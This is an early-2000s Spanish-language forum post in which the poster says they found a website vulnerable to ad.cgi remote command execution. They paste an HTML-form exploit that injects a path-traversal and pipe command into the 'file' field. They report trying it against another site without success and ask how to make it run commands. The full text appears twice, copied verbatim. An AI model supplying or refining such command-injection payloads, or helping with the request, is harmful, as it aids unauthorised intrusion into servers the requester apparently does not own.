smitter
15-09-2003, 18:07
He encontrado una dirección con la vulnerabilidad ad.cgi, que según parece permite a un intruso ejecutar comandos remotos.
Tambien tengo (creo), el exploit, para aplicarlo, pero no sé como debo hacerlo, y estoy deseando poder aprender.
Según pone en la página
http://www.securityfocus.com/bid/2103
el exploit es este:
<html>
<form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
<h1>ad.cgi exploit</h1>
Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|">
<input type=submit value=run>
</form>
</html>
Ahora bien, ¿Que hago con el?
Lo he ejecutado como html, sustituyendo www.conservatives.net/someplace/ad.cgi
por www.webdelfallo.com/ad.cgi y no consigo nada más que me responda 404 error.
¿Cómo se aplica el exploit para poder ejecutar comandos?
Saluditos.
Tambien tengo (creo), el exploit, para aplicarlo, pero no sé como debo hacerlo, y estoy deseando poder aprender.
Según pone en la página
http://www.securityfocus.com/bid/2103
el exploit es este:
<html>
<form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
<h1>ad.cgi exploit</h1>
Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|">
<input type=submit value=run>
</form>
</html>
Ahora bien, ¿Que hago con el?
Lo he ejecutado como html, sustituyendo www.conservatives.net/someplace/ad.cgi
por www.webdelfallo.com/ad.cgi y no consigo nada más que me responda 404 error.
¿Cómo se aplica el exploit para poder ejecutar comandos?
Saluditos.